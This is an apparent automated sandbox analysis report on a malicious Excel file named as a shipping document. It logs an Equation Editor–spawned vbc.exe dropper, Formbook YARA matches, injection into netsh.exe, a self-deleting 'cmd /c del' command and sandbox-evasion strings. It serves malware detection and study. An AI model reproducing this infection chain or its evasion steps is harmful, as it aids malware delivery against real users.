Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FE2E9	5_2_008FE2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A1238	5_2_009A1238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A63BF	5_2_009A63BF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FF3CF	5_2_008FF3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009263DB	5_2_009263DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00902305	5_2_00902305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00907353	5_2_00907353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0094A37B	5_2_0094A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00935485	5_2_00935485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00911489	5_2_00911489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098443E	5_2_0098443E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093D47D	5_2_0093D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091C5F0	5_2_0091C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090351F	5_2_0090351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00946540	5_2_00946540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00904680	5_2_00904680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090E6C1	5_2_0090E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0094A634	5_2_0094A634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A2622	5_2_009A2622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098579A	5_2_0098579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090C7BC	5_2_0090C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009357C3	5_2_009357C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099F8EE	5_2_0099F8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090C85C	5_2_0090C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092286D	5_2_0092286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A098E	5_2_009A098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009029B2	5_2_009029B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009169FE	5_2_009169FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00985955	5_2_00985955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098394B	5_2_0098394B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009B3A83	5_2_009B3A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009ACBA4	5_2_009ACBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0098DBDA	5_2_0098DBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FFBD7	5_2_008FFBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00927B00	5_2_00927B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099FDDD	5_2_0099FDDD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00930D3B	5_2_00930D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090CD5B	5_2_0090CD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00932E2F	5_2_00932E2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091EE4C	5_2_0091EE4C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0099CFB1	5_2_0099CFB1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00972FDC	5_2_00972FDC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00910F3F	5_2_00910F3F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092DF7C	5_2_0092DF7C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D1E0C6	7_2_00D1E0C6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D3905A	7_2_00D3905A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D23040	7_2_00D23040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D4D005	7_2_00D4D005
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D1E2E9	7_2_00D1E2E9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DC1238	7_2_00DC1238
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D463DB	7_2_00D463DB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D1F3CF	7_2_00D1F3CF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DC63BF	7_2_00DC63BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D27353	7_2_00D27353
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D6A37B	7_2_00D6A37B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D22305	7_2_00D22305
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D55485	7_2_00D55485
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D31489	7_2_00D31489
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D5D47D	7_2_00D5D47D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D3C5F0	7_2_00D3C5F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D66540	7_2_00D66540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D2351F	7_2_00D2351F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D2E6C1	7_2_00D2E6C1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D24680	7_2_00D24680
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D6A634	7_2_00D6A634
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DC2622	7_2_00DC2622
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D557C3	7_2_00D557C3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DA579A	7_2_00DA579A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D2C7BC	7_2_00D2C7BC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DBF8EE	7_2_00DBF8EE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D2C85C	7_2_00D2C85C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D4286D	7_2_00D4286D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D369FE	7_2_00D369FE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DC098E	7_2_00DC098E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D229B2	7_2_00D229B2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DA5955	7_2_00DA5955
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DD3A83	7_2_00DD3A83
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DADBDA	7_2_00DADBDA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D1FBD7	7_2_00D1FBD7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DCCBA4	7_2_00DCCBA4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D47B00	7_2_00D47B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DBFDDD	7_2_00DBFDDD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D2CD5B	7_2_00D2CD5B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D50D3B	7_2_00D50D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D3EE4C	7_2_00D3EE4C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D52E2F	7_2_00D52E2F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00DBCFB1	7_2_00DBCFB1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D4DF7C	7_2_00D4DF7C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D30F3F	7_2_00D30F3F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_0009D069	7_2_0009D069
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_0009DA97	7_2_0009DA97
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00082D8D	7_2_00082D8D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00089E2B	7_2_00089E2B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00089E30	7_2_00089E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_0009DF79	7_2_0009DF79
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00082FB0	7_2_00082FB0

Source: C:\Users\Public\vbc.exe	Code function: String function: 008FDF5C appears 120 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008FE2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0096F970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0094373B appears 245 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00943F92 appears 132 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00D6373B appears 238 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00D63F92 appears 132 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00D1E2A8 appears 38 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00D1DF5C appears 118 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00D8F970 appears 81 times

Source: 00000005.00000002.2207008330.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2207008330.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2206934673.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2206934673.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2371233155.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2371233155.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2206743064.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2206743064.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2371354059.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2371354059.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2371384803.00000000001B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2371384803.00000000001B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2169703300.0000000003489000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2169703300.0000000003489000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: svchost[1].exe.2.dr, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'CreateDecryptor'
Source: svchost[1].exe.2.dr, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.vbc.exe.fa0000.0.unpack, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.fa0000.0.unpack, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vbc.exe.fa0000.2.unpack, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.fa0000.2.unpack, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.vbc.exe.fa0000.5.unpack, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.fa0000.5.unpack, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.vbc.exe.fa0000.0.unpack, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.fa0000.0.unpack, MediaManager/ued25ue5ebuf66euf7c8ue0bcue41duf2c7uf2d1ueb0eue9d6uf56auf25b.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00458873 push eax; retf 0017h	4_2_00458874
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00454566 push esp; retf 0017h	4_2_00454567
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004589D0 push esp; retf 0017h	4_2_004589D1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00454789 pushad ; retf 0017h	4_2_0045478A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004587B7 push esp; retf 0017h	4_2_004587B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004527B0 push esi; ret	4_2_004527B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D069 push esi; ret	5_2_0041D067
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004080F7 pushad ; retf	5_2_004080FC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004169CD push ecx; iretd	5_2_004169D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004289F7 pushfd ; iretd	5_2_004289F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004169F6 push eax; iretd	5_2_004169F7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041DA38 push esi; ret	5_2_0041D067
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040E2FF push ds; retf	5_2_0040E326
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041DA97 push esi; ret	5_2_0041D067
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00417ABB push ebx; iretd	5_2_00417ABC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041833A push cs; retf	5_2_0041833D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004164C5 push es; retf	5_2_004164CA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D4FB push esi; ret	5_2_0041D067
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D5C9 push esi; ret	5_2_0041D067
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CEF2 push eax; ret	5_2_0041CEF8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CEFB push eax; ret	5_2_0041CF62
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CEA5 push eax; ret	5_2_0041CEF8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CF5C push eax; ret	5_2_0041CF62
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D7F1 push esi; ret	5_2_0041D067
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CF89 push esi; ret	5_2_0041D067
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041CF96 push esi; ret	5_2_0041D067
Source: C:\Users\Public\vbc.exe	Code function: 5_2_008FDFA1 push ecx; ret	5_2_008FDFB4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_00D1DFA1 push ecx; ret	7_2_00D1DFB4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_0009D069 push esi; ret	7_2_0009D067
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_000880F7 pushad ; retf	7_2_000880FC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 7_2_0008E2FF push ds; retf	7_2_0008E326

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2336, type: MEMORY

Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2169503612.00000000024A6000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Windows Analysis Report CMACGM-XIN SHANGHAI -08M91W1MA-TRISK-QAHMD.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

